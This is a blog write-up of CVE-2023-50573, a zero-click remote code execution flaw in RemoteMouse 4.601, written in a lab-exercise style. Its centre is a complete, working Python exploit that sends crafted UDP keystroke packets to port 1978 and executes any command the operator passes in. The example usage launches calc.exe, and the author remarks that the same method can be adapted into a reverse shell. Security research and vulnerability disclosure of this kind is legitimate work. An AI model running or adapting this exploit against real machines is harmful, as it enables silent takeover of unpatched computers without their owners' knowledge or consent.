Almost every
Exploiting an RemoteMouse (Zero-Click)
Hello folks, today we’re diving into something a bit different RemoteMouse 4.601, an app that lets you control your PC from an Android device While the idea of controlling your computer from a distance sounds super convenient lol, it also has its downsides Let’s talk about some serious vulnerabilities that have been uncovered in the app that could potentially allow attackers to take over a target system with no user interaction, Yeah, you read that right Zero-Click Exploit.
CVEs:
CVE-2023-50573Arbitrary Code ExecutionCVE-2023-51131Unquoted Service Path
One of these vulnerabilities, CVE-2023-50573, is particularly nasty and dangerous It allows arbitrary code execution through a vulnerable service running over UDP, The beauty and danger of this bug is that it doesn’t require the victim to do anything, no clicks, no file downloads, none, no, non, nein, nada, nie, net, just a simple UDP packet. so Let’s break it down.
The Vulnerability: CVE-2023-50573 – Arbitrary Code Execution
In version 4.601 of RemoteMouse theres an issue in the UDP-based communication between devices, an attacker can send malformed UDP packets to the target system, If the packets are crafted in a certain or malicious way then they can trigger arbitrary code execution on the system, leading to complete control of the victim’s machine without any user interaction, That’s the heart of the zero-click exploit. 
Exploitation?
To exploit this vulnerability, attackers don’t need to trick the user into clicking anything or opening a file, All they need is the ability to send malicious UDP packets to the vulnerable target system, Once the packets hit the server, they can execute arbitrary code, which could potentially be used for anything from taking full control of the system. 
Lab Setup
- VM: Windows 10 22H2
- RemoteMouse 4.601 On VM
- Windows 10 22H2 Host
- Python Or C++ IDE Installed
Exploit
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
import socket
import enum
import re
import time
import argparse
class Keycodes(enum.Enum):
WIN = "WIN"
DELETE = "DELETE"
ENTER = "RTN"
class RemoteMouseExploit:
def __init__(self, target_ip):
self.target_ip = target_ip
self.re_keycodes = re.compile(r"(\[.*?\])")
def char2pkt(self, s):
i = ord(s) ^ 53
rhs = "[ras]{}".format(i)
return "key {}{}".format(len(rhs), rhs)
def special2pkt(self, kc):
return "key {}{}".format(len(kc.value), kc.value)
def combo2pkt(self, s, kc):
if len(s) != 1:
s = Keycodes[s].value
if not isinstance(kc, list):
kc = [kc]
modifiers = '[*]' + '[*]'.join([k.value for k in kc])
rhs = "[kld]{}{}".format(s, modifiers)
return "key {}{}".format(len(rhs), rhs)
def parse_cmd(self, s):
pkts = []
for tok in re.split(self.re_keycodes, s):
if not (tok.startswith('[') and tok.endswith(']')):
pkts += [self.char2pkt(c) for c in tok]
continue
if '+' in tok:
cmds = tok[1:-1].split('+')
parsed_cmds = [Keycodes[cmd] if cmd in Keycodes.__members__ else cmd for cmd in cmds]
pkts.append(self.combo2pkt(parsed_cmds[-1], parsed_cmds[:-1]))
continue
pkts.append(self.special2pkt(Keycodes[tok[1:-1]]))
return pkts
def send_exploit(self, pkts):
print("[*] INFO: Sending exploit to", self.target_ip)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
for pkt in pkts:
time.sleep(0.08)
print("[*] INFO: Sending '{}'".format(pkt))
sock.sendto(pkt.encode('utf-8'), (self.target_ip, 1978))
# Usage
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Send exploit payloads to RemoteMouse servers', epilog='Zero-Click RCE')
print("Usage: python exploit.py 192.168.26.128 '[WIN+R]calc.exe[DELETE][ENTER]'")
parser.add_argument('target_ip', type=str, help='IP address of the target')
parser.add_argument('command', type=str, help='Command to execute')
args = parser.parse_args()
exploit = RemoteMouseExploit(args.target_ip)
cmd_pkts = exploit.parse_cmd(args.command)
print("[*] INFO: Executing '{}' against {} running on Windows (Unencrypted session)".format(args.command, args.target_ip))
exploit.send_exploit(cmd_pkts)
Run the following exploit after installing an RemoteMouse on VM and make sure you running this exploit from host
after this the exploit should open the run > then its gonna open the calc.exe, this means our exploit executed successfully now if we modify our exploit to get reverse then we can would also get an reverse shell also.
Why is This Dangerous?
This vulnerability has remote attack vectors, meaning the attacker doesn’t need to be physically near the target machine. As long as they can send these specially crafted UDP packets over the network, they can cause all kinds of chaos. This opens the door for a wide range of malicious activities, from spying on the system to turning it into a botnet for further attacks.
Final Thoughts
Zero-click vulnerabilities are some of the most dangerous kinds of bugs out there because they don’t require the victim to take any action. This RemoteMouse vulnerability is a perfect example of how an attacker can gain access to a system through a single malicious network packet. While RemoteMouse is a cool tool for remote control, this bug serves as a good reminder of the importance of network security and keeping our systems patched.
Special Thanks
- Rémi GASCOU (@Podalirius) - his previous research about
RemoteMouse-3.008-Exploitmade me do an case-study about this vulnerablity in depth and his exploit made me understand the nature of Vulnerability and wrote an C Exploit for this - Paolo Stagno (@VoidSec)
- M. Akil Gündoğan (@akilgundogan)
References:
- Exploit (Python) https://github.com/p0dalirius/RemoteMouse-3.008-Exploit
- RemoteMouse (Vendor Website)
- Blog https://podalirius.net/en/articles/writing-an-exploit-for-remotemouse-3.008/
CVE-2023-50573
also this blog post is limited, to media files including proper video cve and exploit file i woudl upload it soon